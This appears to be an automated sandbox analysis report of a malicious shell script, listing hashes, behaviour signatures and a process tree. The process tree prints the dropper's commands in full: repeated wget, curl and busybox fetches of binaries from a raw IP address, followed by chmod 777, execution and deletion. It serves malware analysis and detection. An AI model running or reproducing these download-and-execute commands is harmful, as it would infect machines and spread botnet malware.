Analysis
- max time kernel: 19s
- max time network: 49s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/10/2024, 01:37
Static task
- static1
Behavioral task
- behavioral1: Sample ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh, Resource ubuntu1804-amd64-20240611-en
- behavioral2: Sample ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh, Resource debian9-armhf-20240611-en
- behavioral3: Sample ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh, Resource debian9-mipsbe-20240611-en
- behavioral4: Sample ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh, Resource debian9-mipsel-20240418-en
General
- Target: ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
- Size: 10KB
- MD5: d02d2cc45f453ae469915bf5bfcf48ec
- SHA1: 5db9569732492cb7f0762973db3950e0cbbff9d8
- SHA256: ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1
- SHA512: e6f62639d7a9ed67f76e803004282c82162e299db70a632e144b81ac07192254c5e424f5bc32b5267f608d7b11c7692c55098a8f3d0dd4fe69efa61d22430f3b
- SSDEEP: 96:rb5p07Lo4jxniybeVFX5Xe4WVykrlkz9Cb5O:rb5y7Lo4jp+Fwb5O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
716  chmod
767  chmod
797  chmod
809  chmod
815  chmod
674  chmod
684  chmod
791  chmod
803  chmod
821  chmod
731  chmod
749  chmod
Executes dropped EXE 12 IoCs
ioc                                      pid  Process
/tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd  675  Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd
/tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y  685  vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y
/tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0  718  1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0
/tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D  733  U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D
/tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2  750  l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2
/tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy  768  Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy
/tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH  792  dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH
/tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8  798  tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8
/tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx  804  EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx
/tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6  810  RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6
/tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB  816  s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB
/tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr  822  ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr
Checks CPU configuration 1 TTPs 12 IoCs
Checks CPU information that indicates whether the system is a virtual machine.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl  (12 occurrences)
Reads runtime system information 24 IoCs
description              ioc                             Process
File opened for reading  /proc/sys/crypto/fips_enabled   curl  (12 occurrences)
File opened for reading  /proc/self/auxv                 curl  (12 occurrences)
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                                      Process
File opened for modification  /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr  curl
File opened for modification  /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd  curl
File opened for modification  /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y  curl
File opened for modification  /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2  curl
File opened for modification  /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx  curl
File opened for modification  /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8  curl
File opened for modification  /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6  curl
File opened for modification  /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB  curl
File opened for modification  /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0  curl
File opened for modification  /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D  curl
File opened for modification  /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy  curl
File opened for modification  /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH  curl
Processes
- /tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh (PID 646): /tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
  - /bin/rm (PID 649): /bin/rm bins.sh
  - /usr/bin/wget (PID 652): wget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd
  - /usr/bin/curl (PID 662): curl -O http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 671): /bin/busybox wget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd
  - /bin/chmod (PID 674): chmod 777 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd [File and Directory Permissions Modification]
  - /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd (PID 675): ./Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd [Executes dropped EXE]
  - /bin/rm (PID 677): rm Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd
  - /usr/bin/wget (PID 679): wget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y
  - /usr/bin/curl (PID 681): curl -O http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 683): /bin/busybox wget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y
  - /bin/chmod (PID 684): chmod 777 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y [File and Directory Permissions Modification]
  - /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y (PID 685): ./vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y [Executes dropped EXE]
  - /bin/rm (PID 686): rm vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y
  - /usr/bin/wget (PID 687): wget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0
  - /usr/bin/curl (PID 695): curl -O http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 700): /bin/busybox wget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0
  - /bin/chmod (PID 716): chmod 777 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 [File and Directory Permissions Modification]
  - /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 (PID 718): ./1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 [Executes dropped EXE]
  - /bin/rm (PID 719): rm 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0
  - /usr/bin/wget (PID 721): wget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D
  - /usr/bin/curl (PID 724): curl -O http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 729): /bin/busybox wget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D
  - /bin/chmod (PID 731): chmod 777 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D [File and Directory Permissions Modification]
  - /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D (PID 733): ./U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D [Executes dropped EXE]
  - /bin/rm (PID 734): rm U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D
  - /usr/bin/wget (PID 737): wget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2
  - /usr/bin/curl (PID 742): curl -O http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 748): /bin/busybox wget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2
  - /bin/chmod (PID 749): chmod 777 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 [File and Directory Permissions Modification]
  - /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 (PID 750): ./l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 [Executes dropped EXE]
  - /bin/rm (PID 751): rm l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2
  - /usr/bin/wget (PID 752): wget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy
  - /usr/bin/curl (PID 755): curl -O http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 764): /bin/busybox wget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy
  - /bin/chmod (PID 767): chmod 777 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy [File and Directory Permissions Modification]
  - /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy (PID 768): ./Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy [Executes dropped EXE]
  - /bin/rm (PID 769): rm Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy
  - /usr/bin/wget (PID 771): wget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH
  - /usr/bin/curl (PID 787): curl -O http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 790): /bin/busybox wget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH
  - /bin/chmod (PID 791): chmod 777 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH [File and Directory Permissions Modification]
  - /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH (PID 792): ./dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH [Executes dropped EXE]
  - /bin/rm (PID 793): rm dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH
  - /usr/bin/wget (PID 794): wget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8
  - /usr/bin/curl (PID 795): curl -O http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 796): /bin/busybox wget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8
  - /bin/chmod (PID 797): chmod 777 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 [File and Directory Permissions Modification]
  - /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 (PID 798): ./tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 [Executes dropped EXE]
  - /bin/rm (PID 799): rm tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8
  - /usr/bin/wget (PID 800): wget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx
  - /usr/bin/curl (PID 801): curl -O http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 802): /bin/busybox wget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx
  - /bin/chmod (PID 803): chmod 777 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx [File and Directory Permissions Modification]
  - /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx (PID 804): ./EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx [Executes dropped EXE]
  - /bin/rm (PID 805): rm EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx
  - /usr/bin/wget (PID 806): wget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6
  - /usr/bin/curl (PID 807): curl -O http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 808): /bin/busybox wget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6
  - /bin/chmod (PID 809): chmod 777 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 [File and Directory Permissions Modification]
  - /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 (PID 810): ./RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 [Executes dropped EXE]
  - /bin/rm (PID 811): rm RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6
  - /usr/bin/wget (PID 812): wget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB
  - /usr/bin/curl (PID 813): curl -O http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 814): /bin/busybox wget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB
  - /bin/chmod (PID 815): chmod 777 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB [File and Directory Permissions Modification]
  - /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB (PID 816): ./s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB [Executes dropped EXE]
  - /bin/rm (PID 817): rm s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB
  - /usr/bin/wget (PID 818): wget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr
  - /usr/bin/curl (PID 819): curl -O http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 820): /bin/busybox wget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr
  - /bin/chmod (PID 821): chmod 777 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr [File and Directory Permissions Modification]
  - /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr (PID 822): ./ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr [Executes dropped EXE]
  - /bin/rm (PID 823): rm ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr
  - /usr/bin/wget (PID 824): wget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97